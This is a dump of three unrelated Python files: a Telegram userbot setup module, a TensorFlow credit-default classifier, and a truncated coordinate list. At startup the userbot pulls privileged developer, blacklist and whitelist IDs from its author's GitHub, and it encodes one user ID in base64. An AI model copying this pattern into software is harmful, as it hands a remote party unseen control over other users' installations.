ext
stringclasses 9
values | sha
stringlengths 40
40
| content
stringlengths 3
1.04M
|
---|---|---|
py | 7df7bbea31b445bdfd968395733ae284e05abe14 | # Copyright (C) 2019 The Raphielscape Company LLC.
#
# Licensed under the Raphielscape Public License, Version 1.d (the "License");
# you may not use this file except in compliance with the License.
#
# inline credit @keselekpermen69
# Recode by @mrismanaziz
# t.me/SharingUserbot
#
""" Userbot initialization. """
import logging
import os
import re
import sys
import time
from base64 import b64decode
from distutils.util import strtobool as sb
from logging import DEBUG, INFO, basicConfig, getLogger
from math import ceil
from pathlib import Path
from sys import version_info
from dotenv import load_dotenv
from git import Repo
from pylast import LastFMNetwork, md5
from pySmartDL import SmartDL
from pytgcalls import PyTgCalls
from requests import get
from telethon import Button
from telethon.errors import UserIsBlockedError
from telethon.network.connection.tcpabridged import ConnectionTcpAbridged
from telethon.sessions import StringSession
from telethon.sync import TelegramClient, custom, events
from telethon.tl.types import InputWebDocument
from telethon.utils import get_display_name
from .storage import Storage
def STORAGE(n):
return Storage(Path("data") / n)
load_dotenv("config.env")
StartTime = time.time()
repo = Repo()
branch = repo.active_branch.name
# Global Variables
COUNT_MSG = 0
USERS = {}
COUNT_PM = {}
LASTMSG = {}
CMD_HELP = {}
CMD_LIST = {}
SUDO_LIST = {}
ZALG_LIST = {}
LOAD_PLUG = {}
INT_PLUG = ""
ISAFK = False
AFKREASON = None
ENABLE_KILLME = True
# Bot Logs setup:
logging.basicConfig(
format="[%(name)s] - [%(levelname)s] - %(message)s",
level=logging.INFO,
)
logging.getLogger("asyncio").setLevel(logging.ERROR)
logging.getLogger("pytgcalls").setLevel(logging.ERROR)
logging.getLogger("telethon.network.mtprotosender").setLevel(logging.ERROR)
logging.getLogger("telethon.network.connection.connection").setLevel(logging.ERROR)
LOGS = getLogger(__name__)
if version_info[0] < 3 or version_info[1] < 9:
LOGS.info(
"Anda HARUS memiliki python setidaknya versi 3.9."
"Beberapa fitur tergantung versi python ini. Bot berhenti."
)
sys.exit(1)
# Check if the config was edited by using the already used variable.
# Basically, its the 'virginity check' for the config file ;)
CONFIG_CHECK = os.environ.get(
"___________PLOX_______REMOVE_____THIS_____LINE__________", None
)
if CONFIG_CHECK:
LOGS.info(
"Harap hapus baris yang disebutkan dalam tagar pertama dari file config.env"
)
sys.exit(1)
while 0 < 6:
_DEVS = get(
"https://raw.githubusercontent.com/mrismanaziz/Reforestation/master/DEVS.json"
)
if _DEVS.status_code != 200:
if 0 != 5:
continue
DEVS = [844432220, 1906014306, 1382636419, 2133486058]
break
DEVS = _DEVS.json()
break
del _DEVS
SUDO_USERS = {int(x) for x in os.environ.get("SUDO_USERS", "").split()}
BL_CHAT = {int(x) for x in os.environ.get("BL_CHAT", "").split()}
# For Blacklist Group Support
BLACKLIST_CHAT = os.environ.get("BLACKLIST_CHAT", None)
if not BLACKLIST_CHAT:
BLACKLIST_CHAT = [-1001473548283]
# Telegram App KEY and HASH
API_KEY = int(os.environ.get("API_KEY") or 0)
API_HASH = str(os.environ.get("API_HASH") or None)
# Userbot Session String
STRING_SESSION = os.environ.get("STRING_SESSION", None)
STRING_2 = os.environ.get("STRING_2", None)
STRING_3 = os.environ.get("STRING_3", None)
STRING_4 = os.environ.get("STRING_4", None)
STRING_5 = os.environ.get("STRING_5", None)
# Logging channel/group ID configuration.
BOTLOG_CHATID = int(os.environ.get("BOTLOG_CHATID") or 0)
# Load or No Load modules
LOAD = os.environ.get("LOAD", "").split()
NO_LOAD = os.environ.get("NO_LOAD", "").split()
# Bleep Blop, this is a bot ;)
PM_AUTO_BAN = sb(os.environ.get("PM_AUTO_BAN", "True"))
PM_LIMIT = int(os.environ.get("PM_LIMIT", 6))
# Custom Handler command
CMD_HANDLER = os.environ.get("CMD_HANDLER") or "."
SUDO_HANDLER = os.environ.get("SUDO_HANDLER", r"$")
# Support
GROUP = os.environ.get("GROUP", "SharingUserbot")
CHANNEL = os.environ.get("CHANNEL", "Lunatic0de")
# Heroku Credentials for updater.
HEROKU_APP_NAME = os.environ.get("HEROKU_APP_NAME", None)
HEROKU_API_KEY = os.environ.get("HEROKU_API_KEY", None)
# JustWatch Country
WATCH_COUNTRY = os.environ.get("WATCH_COUNTRY", "ID")
# Github Credentials for updater and Gitupload.
GIT_REPO_NAME = os.environ.get("GIT_REPO_NAME", None)
GITHUB_ACCESS_TOKEN = os.environ.get("GITHUB_ACCESS_TOKEN", None)
# Custom (forked) repo URL for updater.
UPSTREAM_REPO_URL = os.environ.get(
"UPSTREAM_REPO_URL", "https://github.com/dadkuy/Man-Userbot.git"
)
# Custom Name Sticker Pack
S_PACK_NAME = os.environ.get("S_PACK_NAME", None)
# SQL Database URI
DB_URI = os.environ.get("DATABASE_URL", None)
# OCR API key
OCR_SPACE_API_KEY = os.environ.get("OCR_SPACE_API_KEY", None)
# remove.bg API key
REM_BG_API_KEY = os.environ.get("REM_BG_API_KEY", None)
# Chrome Driver and Headless Google Chrome Binaries
CHROME_DRIVER = os.environ.get("CHROME_DRIVER") or "/usr/bin/chromedriver"
GOOGLE_CHROME_BIN = os.environ.get("GOOGLE_CHROME_BIN") or "/usr/bin/google-chrome"
# OpenWeatherMap API Key
OPEN_WEATHER_MAP_APPID = os.environ.get("OPEN_WEATHER_MAP_APPID", None)
WEATHER_DEFCITY = os.environ.get("WEATHER_DEFCITY", "Jakarta")
# Anti Spambot Config
ANTI_SPAMBOT = sb(os.environ.get("ANTI_SPAMBOT", "False"))
ANTI_SPAMBOT_SHOUT = sb(os.environ.get("ANTI_SPAMBOT_SHOUT", "False"))
# untuk perintah teks costum .alive
ALIVE_TEKS_CUSTOM = os.environ.get("ALIVE_TEKS_CUSTOM", "Hey, I am alive.")
# Default .alive name
ALIVE_NAME = os.environ.get("ALIVE_NAME", "Dad")
# Custom Emoji Alive
ALIVE_EMOJI = os.environ.get("ALIVE_EMOJI", "🖕")
# Custom Emoji Alive
INLINE_EMOJI = os.environ.get("INLINE_EMOJI", "✘")
# Custom icon HELP
ICON_HELP = os.environ.get("ICON_HELP", "❉")
# Time & Date - Country and Time Zone
COUNTRY = str(os.environ.get("COUNTRY", "ID"))
TZ_NUMBER = int(os.environ.get("TZ_NUMBER", 1))
# Clean Welcome
CLEAN_WELCOME = sb(os.environ.get("CLEAN_WELCOME", "True"))
# Zipfile module
ZIP_DOWNLOAD_DIRECTORY = os.environ.get("ZIP_DOWNLOAD_DIRECTORY", "./zips")
# bit.ly module
BITLY_TOKEN = os.environ.get("BITLY_TOKEN", None)
# Bot version
BOT_VER = os.environ.get("BOT_VER", "3.1.3")
# Default .alive logo
ALIVE_LOGO = (
os.environ.get("ALIVE_LOGO") or "https://telegra.ph/file/f68543ad7bf3f32957d45.jpg"
)
INLINE_PIC = (
os.environ.get("INLINE_PIC") or "https://telegra.ph/file/9dc4e335feaaf6a214818.jpg"
)
# Picture For VCPLUGIN
PLAY_PIC = (
os.environ.get("PLAY_PIC") or "https://telegra.ph/file/6213d2673486beca02967.png"
)
QUEUE_PIC = (
os.environ.get("QUEUE_PIC") or "https://telegra.ph/file/d6f92c979ad96b2031cba.png"
)
DEFAULT = list(map(int, b64decode("ODQ0NDMyMjIw").split()))
# Last.fm Module
BIO_PREFIX = os.environ.get("BIO_PREFIX", None)
DEFAULT_BIO = os.environ.get("DEFAULT_BIO", None)
LASTFM_API = os.environ.get("LASTFM_API", None)
LASTFM_SECRET = os.environ.get("LASTFM_SECRET", None)
LASTFM_USERNAME = os.environ.get("LASTFM_USERNAME", None)
LASTFM_PASSWORD_PLAIN = os.environ.get("LASTFM_PASSWORD", None)
LASTFM_PASS = md5(LASTFM_PASSWORD_PLAIN)
lastfm = None
if LASTFM_API and LASTFM_SECRET and LASTFM_USERNAME and LASTFM_PASS:
try:
lastfm = LastFMNetwork(
api_key=LASTFM_API,
api_secret=LASTFM_SECRET,
username=LASTFM_USERNAME,
password_hash=LASTFM_PASS,
)
except Exception:
pass
TEMP_DOWNLOAD_DIRECTORY = os.environ.get("TMP_DOWNLOAD_DIRECTORY", "./downloads/")
# Deezloader
DEEZER_ARL_TOKEN = os.environ.get("DEEZER_ARL_TOKEN", None)
# NSFW Detect DEEP AI
DEEP_AI = os.environ.get("DEEP_AI", None)
# Inline bot helper
BOT_TOKEN = os.environ.get("BOT_TOKEN", None)
BOT_USERNAME = os.environ.get("BOT_USERNAME", None)
# Jangan di hapus Nanti ERROR
while 0 < 6:
_BLACKLIST = get(
"https://raw.githubusercontent.com/mrismanaziz/Reforestation/master/manblacklist.json"
)
if _BLACKLIST.status_code != 200:
if 0 != 5:
continue
blacklistman = []
break
blacklistman = _BLACKLIST.json()
break
del _BLACKLIST
while 0 < 6:
_WHITELIST = get(
"https://raw.githubusercontent.com/mrismanaziz/Reforestation/master/whitelist.json"
)
if _WHITELIST.status_code != 200:
if 0 != 5:
continue
WHITELIST = []
break
WHITELIST = _WHITELIST.json()
break
del _WHITELIST
# 'bot' variable
if STRING_SESSION:
session = StringSession(str(STRING_SESSION))
else:
session = "ManUserBot"
try:
bot = TelegramClient(
session=session,
api_id=API_KEY,
api_hash=API_HASH,
connection=ConnectionTcpAbridged,
auto_reconnect=True,
connection_retries=None,
)
call_py = PyTgCalls(bot)
except Exception as e:
print(f"STRING_SESSION - {e}")
sys.exit()
if STRING_2:
session2 = StringSession(str(STRING_2))
MAN2 = TelegramClient(
session=session2,
api_id=API_KEY,
api_hash=API_HASH,
connection=ConnectionTcpAbridged,
auto_reconnect=True,
connection_retries=None,
)
call_py2 = PyTgCalls(MAN2)
else:
MAN2 = None
if STRING_3:
session3 = StringSession(str(STRING_3))
MAN3 = TelegramClient(
session=session3,
api_id=API_KEY,
api_hash=API_HASH,
connection=ConnectionTcpAbridged,
auto_reconnect=True,
connection_retries=None,
)
call_py3 = PyTgCalls(MAN3)
else:
MAN3 = None
if STRING_4:
session4 = StringSession(str(STRING_4))
MAN4 = TelegramClient(
session=session4,
api_id=API_KEY,
api_hash=API_HASH,
connection=ConnectionTcpAbridged,
auto_reconnect=True,
connection_retries=None,
)
call_py4 = PyTgCalls(MAN4)
else:
MAN4 = None
if STRING_5:
session5 = StringSession(str(STRING_5))
MAN5 = TelegramClient(
session=session5,
api_id=API_KEY,
api_hash=API_HASH,
connection=ConnectionTcpAbridged,
auto_reconnect=True,
connection_retries=None,
)
call_py5 = PyTgCalls(MAN5)
else:
MAN5 = None
async def check_botlog_chatid() -> None:
if not BOTLOG_CHATID:
LOGS.warning(
"var BOTLOG_CHATID kamu belum di isi. Buatlah grup telegram dan masukan bot @MissRose_bot lalu ketik /id Masukan id grup nya di var BOTLOG_CHATID"
)
sys.exit(1)
async def update_restart_msg(chat_id, msg_id):
DEFAULTUSER = ALIVE_NAME or "Set `ALIVE_NAME` ConfigVar!"
message = (
f"**Man-UserBot v{BOT_VER} is back up and running!**\n\n"
f"**Telethon:** {version.__version__}\n"
f"**Python:** {python_version()}\n"
f"**User:** {DEFAULTUSER}"
)
await bot.edit_message(chat_id, msg_id, message)
return True
try:
from userbot.modules.sql_helper.globals import delgvar, gvarstatus
chat_id, msg_id = gvarstatus("restartstatus").split("\n")
with bot:
try:
bot.loop.run_until_complete(update_restart_msg(int(chat_id), int(msg_id)))
except BaseException:
pass
delgvar("restartstatus")
except AttributeError:
pass
if BOT_TOKEN is not None:
tgbot = TelegramClient(
"TG_BOT_TOKEN",
api_id=API_KEY,
api_hash=API_HASH,
connection=ConnectionTcpAbridged,
auto_reconnect=True,
connection_retries=None,
).start(bot_token=BOT_TOKEN)
else:
tgbot = None
def paginate_help(page_number, loaded_modules, prefix):
number_of_rows = 6
number_of_cols = 2
global looters
looters = page_number
helpable_modules = [p for p in loaded_modules if not p.startswith("_")]
helpable_modules = sorted(helpable_modules)
modules = [
custom.Button.inline(
"{} {} {}".format(f"{INLINE_EMOJI}", x, f"{INLINE_EMOJI}"),
data="ub_modul_{}".format(x),
)
for x in helpable_modules
]
pairs = list(
zip(
modules[::number_of_cols],
modules[1::number_of_cols],
)
)
if len(modules) % number_of_cols == 1:
pairs.append((modules[-1],))
max_num_pages = ceil(len(pairs) / number_of_rows)
modulo_page = page_number % max_num_pages
if len(pairs) > number_of_rows:
pairs = pairs[
modulo_page * number_of_rows : number_of_rows * (modulo_page + 1)
] + [
(
custom.Button.inline(
"««", data="{}_prev({})".format(prefix, modulo_page)
),
custom.Button.inline("Tutup", b"close"),
custom.Button.inline(
"»»", data="{}_next({})".format(prefix, modulo_page)
),
)
]
return pairs
def ibuild_keyboard(buttons):
keyb = []
for btn in buttons:
if btn[2] and keyb:
keyb[-1].append(Button.url(btn[0], btn[1]))
else:
keyb.append([Button.url(btn[0], btn[1])])
return keyb
with bot:
try:
from userbot.modules.sql_helper.bot_blacklists import check_is_black_list
from userbot.modules.sql_helper.bot_pms_sql import add_user_to_db, get_user_id
from userbot.utils import reply_id
dugmeler = CMD_HELP
user = bot.get_me()
uid = user.id
owner = user.first_name
logo = ALIVE_LOGO
logoman = INLINE_PIC
tgbotusername = BOT_USERNAME
BTN_URL_REGEX = re.compile(
r"(\[([^\[]+?)\]\<buttonurl:(?:/{0,2})(.+?)(:same)?\>)"
)
@tgbot.on(events.NewMessage(incoming=True, func=lambda e: e.is_private))
async def bot_pms(event):
chat = await event.get_chat()
if check_is_black_list(chat.id):
return
if chat.id != uid:
msg = await event.forward_to(uid)
try:
add_user_to_db(
msg.id, get_display_name(chat), chat.id, event.id, 0, 0
)
except Exception as e:
LOGS.error(str(e))
if BOTLOG:
await event.client.send_message(
BOTLOG_CHATID,
f"**ERROR:** Saat menyimpan detail pesan di database\n`{str(e)}`",
)
else:
if event.text.startswith("/"):
return
reply_to = await reply_id(event)
if reply_to is None:
return
users = get_user_id(reply_to)
if users is None:
return
for usr in users:
user_id = int(usr.chat_id)
reply_msg = usr.reply_id
user_name = usr.first_name
break
if user_id is not None:
try:
if event.media:
msg = await event.client.send_file(
user_id,
event.media,
caption=event.text,
reply_to=reply_msg,
)
else:
msg = await event.client.send_message(
user_id,
event.text,
reply_to=reply_msg,
link_preview=False,
)
except UserIsBlockedError:
return await event.reply(
"❌ **Bot ini diblokir oleh pengguna.**"
)
except Exception as e:
return await event.reply(f"**ERROR:** `{e}`")
try:
add_user_to_db(
reply_to, user_name, user_id, reply_msg, event.id, msg.id
)
except Exception as e:
LOGS.error(str(e))
if BOTLOG:
await event.client.send_message(
BOTLOG_CHATID,
f"**ERROR:** Saat menyimpan detail pesan di database\n`{e}`",
)
@tgbot.on(events.InlineQuery)
async def inline_handler(event):
builder = event.builder
result = None
query = event.text
if event.query.user_id == uid and query.startswith("@SharingUserbot"):
buttons = paginate_help(0, dugmeler, "helpme")
result = builder.photo(
file=logoman,
link_preview=False,
text=f"**✗ Man-Userbot Inline Menu ✗**\n\n✣ **Owner** [{user.first_name}](tg://user?id={user.id})\n✣ **Jumlah** `{len(dugmeler)}` Modules",
buttons=buttons,
)
elif query.startswith("repo"):
result = builder.article(
title="Repository",
description="Repository Man - Userbot",
url="https://t.me/SharingUserbot",
thumb=InputWebDocument(INLINE_PIC, 0, "image/jpeg", []),
text="**Man - UserBot**\n➖➖➖➖➖➖➖➖➖➖\n✣ **Owner Repo :** [Risman](https://t.me/mrismanaziz)\n✣ **Support :** @Lunatic0de\n✣ **Repository :** [Man-Userbot](https://github.com/mrismanaziz/Man-Userbot)\n➖➖➖➖➖➖➖➖➖➖",
buttons=[
[
custom.Button.url("ɢʀᴏᴜᴘ", "https://t.me/SharingUserbot"),
custom.Button.url(
"ʀᴇᴘᴏ", "https://github.com/mrismanaziz/Man-Userbot"
),
],
],
link_preview=False,
)
elif query.startswith("Inline buttons"):
markdown_note = query[14:]
prev = 0
note_data = ""
buttons = []
for match in BTN_URL_REGEX.finditer(markdown_note):
n_escapes = 0
to_check = match.start(1) - 1
while to_check > 0 and markdown_note[to_check] == "\\":
n_escapes += 1
to_check -= 1
if n_escapes % 2 == 0:
buttons.append(
(match.group(2), match.group(3), bool(match.group(4)))
)
note_data += markdown_note[prev : match.start(1)]
prev = match.end(1)
elif n_escapes % 2 == 1:
note_data += markdown_note[prev:to_check]
prev = match.start(1) - 1
else:
break
else:
note_data += markdown_note[prev:]
message_text = note_data.strip()
tl_ib_buttons = ibuild_keyboard(buttons)
result = builder.article(
title="Inline creator",
text=message_text,
buttons=tl_ib_buttons,
link_preview=False,
)
else:
result = builder.article(
title="✗ Man-Userbot ✗",
description="Man - UserBot | Telethon",
url="https://t.me/SharingUserbot",
thumb=InputWebDocument(INLINE_PIC, 0, "image/jpeg", []),
text=f"**Man - UserBot**\n➖➖➖➖➖➖➖➖➖➖\n✣ **UserMode:** [{user.first_name}](tg://user?id={user.id})\n✣ **Assistant:** {tgbotusername}\n➖➖➖➖➖➖➖➖➖➖\n**Support:** @Lunatic0de\n➖➖➖➖➖➖➖➖➖➖",
buttons=[
[
custom.Button.url("ɢʀᴏᴜᴘ", "https://t.me/SharingUserbot"),
custom.Button.url(
"ʀᴇᴘᴏ", "https://github.com/mrismanaziz/Man-Userbot"
),
],
],
link_preview=False,
)
await event.answer(
[result], switch_pm="👥 USERBOT PORTAL", switch_pm_param="start"
)
@tgbot.on(events.callbackquery.CallbackQuery(data=re.compile(rb"reopen")))
async def on_plug_in_callback_query_handler(event):
if event.query.user_id == uid or event.query.user_id in SUDO_USERS:
current_page_number = int(looters)
buttons = paginate_help(current_page_number, dugmeler, "helpme")
text = f"**✗ Man-Userbot Inline Menu ✗**\n\n✣ **Owner** [{user.first_name}](tg://user?id={user.id})\n✣ **Jumlah** `{len(dugmeler)}` Modules"
await event.edit(
text,
file=logoman,
buttons=buttons,
link_preview=False,
)
else:
reply_pop_up_alert = f"Kamu Tidak diizinkan, ini Userbot Milik {owner}"
await event.answer(reply_pop_up_alert, cache_time=0, alert=True)
@tgbot.on(
events.callbackquery.CallbackQuery(
data=re.compile(rb"helpme_next\((.+?)\)")
)
)
async def on_plug_in_callback_query_handler(event):
if event.query.user_id == uid or event.query.user_id in SUDO_USERS:
current_page_number = int(event.data_match.group(1).decode("UTF-8"))
buttons = paginate_help(current_page_number + 1, dugmeler, "helpme")
await event.edit(buttons=buttons)
else:
reply_pop_up_alert = (
f"Kamu Tidak diizinkan, ini Userbot Milik {ALIVE_NAME}"
)
await event.answer(reply_pop_up_alert, cache_time=0, alert=True)
@tgbot.on(events.callbackquery.CallbackQuery(data=re.compile(b"close")))
async def on_plug_in_callback_query_handler(event):
if event.query.user_id == uid or event.query.user_id in DEVS and SUDO_USERS:
openlagi = custom.Button.inline("• Re-Open Menu •", data="reopen")
await event.edit(
"⚜️ **Help Mode Button Ditutup!** ⚜️", buttons=openlagi
)
else:
reply_pop_up_alert = f"Kamu Tidak diizinkan, ini Userbot Milik {owner}"
await event.answer(reply_pop_up_alert, cache_time=0, alert=True)
@tgbot.on(
events.callbackquery.CallbackQuery(
data=re.compile(rb"helpme_prev\((.+?)\)")
)
)
async def on_plug_in_callback_query_handler(event):
if event.query.user_id == uid or event.query.user_id in SUDO_USERS:
current_page_number = int(event.data_match.group(1).decode("UTF-8"))
buttons = paginate_help(current_page_number - 1, dugmeler, "helpme")
await event.edit(buttons=buttons)
else:
reply_pop_up_alert = f"Kamu Tidak diizinkan, ini Userbot Milik {owner}"
await event.answer(reply_pop_up_alert, cache_time=0, alert=True)
@tgbot.on(events.callbackquery.CallbackQuery(data=re.compile(b"ub_modul_(.*)")))
async def on_plug_in_callback_query_handler(event):
if event.query.user_id == uid or event.query.user_id in SUDO_USERS:
modul_name = event.data_match.group(1).decode("UTF-8")
cmdhel = str(CMD_HELP[modul_name])
if len(cmdhel) > 150:
help_string = (
str(CMD_HELP[modul_name])
.replace("`", "")
.replace("**", "")[:150]
+ "..."
+ "\n\nBaca Teks Berikutnya Ketik .help "
+ modul_name
+ " "
)
else:
help_string = (
str(CMD_HELP[modul_name]).replace("`", "").replace("**", "")
)
reply_pop_up_alert = (
help_string
if help_string is not None
else "{} Tidak ada dokumen yang telah ditulis untuk modul.".format(
modul_name
)
)
else:
reply_pop_up_alert = f"Kamu Tidak diizinkan, ini Userbot Milik {owner}"
await event.answer(reply_pop_up_alert, cache_time=0, alert=True)
except BaseException:
LOGS.info(
"Help Mode Inline Bot Mu Tidak aktif. Tidak di aktifkan juga tidak apa-apa. "
"Untuk Mengaktifkannya Buat bot di @BotFather Lalu Tambahkan var BOT_TOKEN dan BOT_USERNAME. "
"Pergi Ke @BotFather lalu settings bot » Pilih mode inline » Turn On. "
)
try:
bot.loop.run_until_complete(check_botlog_chatid())
except BaseException as e:
LOGS.exception(f"[BOTLOG] - {e}")
sys.exit(1)
|
py | 7df7bbf3bccb00247020623435ee88914e53b065 | import tensorflow as tf
from tensorflow.python.framework import graph_io
from tensorflow.python.framework import graph_util
from tensorflow import keras
from tensorflow.keras import layers
from tensorflow.keras import backend as K
import argparse
from tensorflow.python import errors_impl as errors
from utils import read_one_column
import os
import time
from utils import data_prep
parser = argparse.ArgumentParser()
parser.add_argument(
'--predict', type=int, default='-1',
help='Do a prediction on specified row of input file')
parser.add_argument('--input_file', type=str, default='final_data_with_feature_engineered.csv',
help='Location of input defaults to final_data_with_feature_engineered.csv')
parser.add_argument('--bench_prediction', type=int, default=-1,
help='Benchmark prediction doing n iterations and taking the average')
config = parser.parse_args()
epochs = 20
batch_size = 256
checkpoint_path = "./saved_models/train"
predict_row = config.predict
input_file = config.input_file
bench_prediction = config.bench_prediction
def export_to_pb(sess, x, filename):
pred_names = ['output']
tf.identity(x, name=pred_names[0])
graph = graph_util.convert_variables_to_constants(sess, sess.graph.as_graph_def(), pred_names)
graph = graph_util.remove_training_nodes(graph)
path = graph_io.write_graph(graph, ".", filename, as_text=False)
print('saved the frozen graph (ready for inference) at: ', path)
def print_nodes(graph):
print([n.name for n in graph.as_graph_def().node])
def build_model(input_shape):
model = keras.Sequential([
layers.Dense(1, use_bias=False, activation='sigmoid', input_shape=[input_shape]),
])
model.compile(loss='binary_crossentropy',
optimizer=tf.train.AdamOptimizer(),
metrics=['accuracy'])
return model
def train(train_x_df, train_y_df):
x = list(train_x_df.columns.values)
model = build_model(len(x))
# Display training progress by printing a single dot for each completed epoch
class PrintDot(keras.callbacks.Callback):
def on_epoch_end(self, epoch, logs):
print('')
print('.', end='')
os.makedirs('./saved_models', exist_ok=True)
cp_callback = keras.callbacks.ModelCheckpoint(checkpoint_path,
save_weights_only=True,
save_best_only=True,
verbose=1)
# first 80 percent for training
train_x = train_x_df[1:246005]
train_y = train_y_df[1:246005]
# other 20 percent for evaluating
eval_x = train_x_df[246006:len(train_x_df) - 1]
eval_y = train_y_df[246006:len(train_y_df) - 1]
# train model
model.fit(train_x, train_y, epochs=epochs,
validation_split=0.2, verbose=0, batch_size=batch_size,
callbacks=[cp_callback])
print('done training')
# get the default session and graph for exporting and calculating the AUC
sess = K.get_session()
graph = K.get_session().graph
# export the graph to a protobuf file for loading in tfe and secure enclave
export_to_pb(K.get_session(),
graph.get_tensor_by_name('dense/Sigmoid:0'),
'house_credit_default.pb')
# evaluate the model and get the AUC, the metric used in the kaggle competition
loss = model.evaluate(eval_x, eval_y, batch_size=batch_size)
predictions = model.predict(eval_x, batch_size=batch_size)
auc = tf.metrics.auc(eval_y, predictions)
print("Evaluation Loss:", loss[0])
print("Accuracy:", loss[1])
sess.run(tf.global_variables_initializer())
sess.run(tf.local_variables_initializer())
print("AUC: ", sess.run([auc])[0][1])
def predict_preamble(train_x_df, train_y_df):
x = list(train_x_df.columns.values)
model = build_model(len(x))
try:
model.load_weights(checkpoint_path)
except errors.InvalidArgumentError:
print("Weights couldn't be found, training before predicting")
train(train_x_df, train_y_df)
model = build_model(len(x))
x = read_one_column(predict_row, train_x_df)
return model, x
def predict(train_x_df, train_y_df):
model, x = predict_preamble(train_x_df, train_y_df)
print("Prediction:", model.predict(x)[0][0])
def benchmark(train_x_df, train_y_df):
model, x = predict_preamble(train_x_df, train_y_df)
total_duration = 0
for i in range(0, bench_prediction):
start = time.time()
model.predict(x)
end = time.time()
duration = end - start
total_duration = total_duration + duration
print("Total Duration:", total_duration)
print("Avg Runtime:", total_duration / bench_prediction * 1000, "ms")
def main():
print('Home Credit Default!')
# TODO only load all data when training
train_x_df, train_y_df = data_prep(input_file)
if predict_row != -1:
predict(train_x_df, train_y_df)
elif bench_prediction != -1:
benchmark(train_x_df, train_y_df)
else:
train(train_x_df, train_y_df)
if __name__ == '__main__':
main()
|
py | 7df7bc6a312f6f47f1ddec6e5aa64b6e4dc33f36 | coordinates_E0E1E1 = ((126, 111),
(126, 112), (126, 114), (127, 93), (127, 104), (127, 108), (127, 109), (127, 110), (127, 111), (127, 112), (128, 82), (128, 93), (128, 94), (128, 104), (128, 107), (129, 81), (129, 82), (129, 93), (129, 95), (129, 104), (129, 106), (129, 108), (130, 80), (130, 82), (130, 93), (130, 96), (130, 104), (130, 106), (130, 108), (131, 79), (131, 82), (131, 94), (131, 97), (131, 104), (131, 107), (132, 78), (132, 80), (132, 82), (132, 94), (132, 96), (132, 98), (132, 104), (132, 107), (133, 74), (133, 76), (133, 77), (133, 79), (133, 80), (133, 81), (133, 84), (133, 94), (133, 96), (133, 97), (133, 99), (133, 103), (133, 105), (133, 106), (133, 108), (133, 129), (134, 75), (134, 78), (134, 79), (134, 80), (134, 81), (134, 82), (134, 85), (134, 93), (134, 95), (134, 96), (134, 97), (134, 98), (134, 101), (134, 104),
(134, 105), (134, 106), (134, 108), (135, 77), (135, 79), (135, 80), (135, 81), (135, 82), (135, 83), (135, 84), (135, 87), (135, 88), (135, 92), (135, 93), (135, 94), (135, 95), (135, 96), (135, 97), (135, 98), (135, 99), (135, 103), (135, 104), (135, 109), (135, 130), (136, 77), (136, 79), (136, 89), (136, 90), (136, 91), (136, 93), (136, 94), (136, 95), (136, 96), (136, 97), (136, 98), (136, 99), (136, 100), (136, 101), (136, 102), (136, 105), (136, 106), (136, 110), (136, 122), (136, 130), (137, 77), (137, 80), (137, 81), (137, 82), (137, 83), (137, 84), (137, 85), (137, 86), (137, 87), (137, 92), (137, 93), (137, 94), (137, 95), (137, 96), (137, 97), (137, 98), (137, 99), (137, 100), (137, 101), (137, 102), (137, 103), (137, 104), (137, 108), (137, 111), (137, 122), (137, 130), (138, 77), (138, 79),
(138, 88), (138, 91), (138, 92), (138, 93), (138, 94), (138, 95), (138, 96), (138, 97), (138, 98), (138, 99), (138, 100), (138, 102), (138, 109), (138, 111), (138, 122), (138, 130), (139, 76), (139, 77), (139, 90), (139, 92), (139, 93), (139, 94), (139, 95), (139, 96), (139, 97), (139, 98), (139, 99), (139, 100), (139, 102), (139, 109), (139, 112), (139, 122), (139, 130), (140, 72), (140, 74), (140, 76), (140, 91), (140, 93), (140, 94), (140, 95), (140, 96), (140, 97), (140, 98), (140, 99), (140, 100), (140, 102), (140, 110), (140, 113), (140, 122), (140, 130), (141, 72), (141, 76), (141, 91), (141, 93), (141, 94), (141, 95), (141, 96), (141, 97), (141, 98), (141, 99), (141, 100), (141, 101), (141, 103), (141, 110), (141, 113), (141, 122), (141, 123), (141, 130), (141, 134), (142, 73), (142, 75), (142, 92),
(142, 94), (142, 95), (142, 96), (142, 97), (142, 98), (142, 99), (142, 100), (142, 101), (142, 102), (142, 104), (142, 110), (142, 112), (142, 122), (142, 123), (142, 130), (142, 135), (143, 73), (143, 75), (143, 92), (143, 94), (143, 95), (143, 96), (143, 97), (143, 98), (143, 99), (143, 100), (143, 101), (143, 102), (143, 103), (143, 105), (143, 110), (143, 112), (143, 122), (143, 123), (143, 130), (143, 131), (143, 134), (144, 74), (144, 92), (144, 94), (144, 95), (144, 96), (144, 97), (144, 98), (144, 99), (144, 100), (144, 101), (144, 102), (144, 103), (144, 106), (144, 107), (144, 108), (144, 109), (144, 111), (144, 121), (144, 123), (144, 129), (144, 132), (145, 85), (145, 90), (145, 91), (145, 92), (145, 93), (145, 94), (145, 95), (145, 96), (145, 97), (145, 98), (145, 99), (145, 100), (145, 101), (145, 102),
(145, 103), (145, 104), (145, 105), (145, 110), (145, 111), (145, 121), (145, 123), (145, 128), (145, 131), (146, 85), (146, 87), (146, 88), (146, 89), (146, 92), (146, 93), (146, 94), (146, 95), (146, 96), (146, 97), (146, 98), (146, 99), (146, 100), (146, 101), (146, 102), (146, 103), (146, 104), (146, 105), (146, 106), (146, 107), (146, 108), (146, 109), (146, 110), (146, 112), (146, 120), (146, 122), (146, 123), (146, 124), (146, 128), (146, 130), (147, 86), (147, 90), (147, 91), (147, 92), (147, 93), (147, 94), (147, 95), (147, 96), (147, 97), (147, 98), (147, 99), (147, 100), (147, 101), (147, 102), (147, 103), (147, 104), (147, 105), (147, 106), (147, 107), (147, 108), (147, 109), (147, 110), (147, 111), (147, 113), (147, 119), (147, 121), (147, 122), (147, 123), (147, 125), (147, 126), (147, 129), (148, 86), (148, 88),
(148, 89), (148, 90), (148, 91), (148, 92), (148, 93), (148, 94), (148, 95), (148, 96), (148, 97), (148, 98), (148, 99), (148, 100), (148, 101), (148, 102), (148, 103), (148, 104), (148, 105), (148, 106), (148, 107), (148, 108), (148, 109), (148, 110), (148, 111), (148, 112), (148, 115), (148, 116), (148, 120), (148, 121), (148, 123), (148, 128), (149, 87), (149, 89), (149, 90), (149, 91), (149, 92), (149, 93), (149, 94), (149, 95), (149, 96), (149, 97), (149, 98), (149, 99), (149, 100), (149, 101), (149, 102), (149, 103), (149, 104), (149, 105), (149, 106), (149, 107), (149, 108), (149, 109), (149, 110), (149, 111), (149, 112), (149, 113), (149, 117), (149, 119), (149, 120), (149, 121), (149, 123), (149, 128), (150, 87), (150, 89), (150, 90), (150, 91), (150, 92), (150, 93), (150, 94), (150, 95), (150, 96), (150, 97),
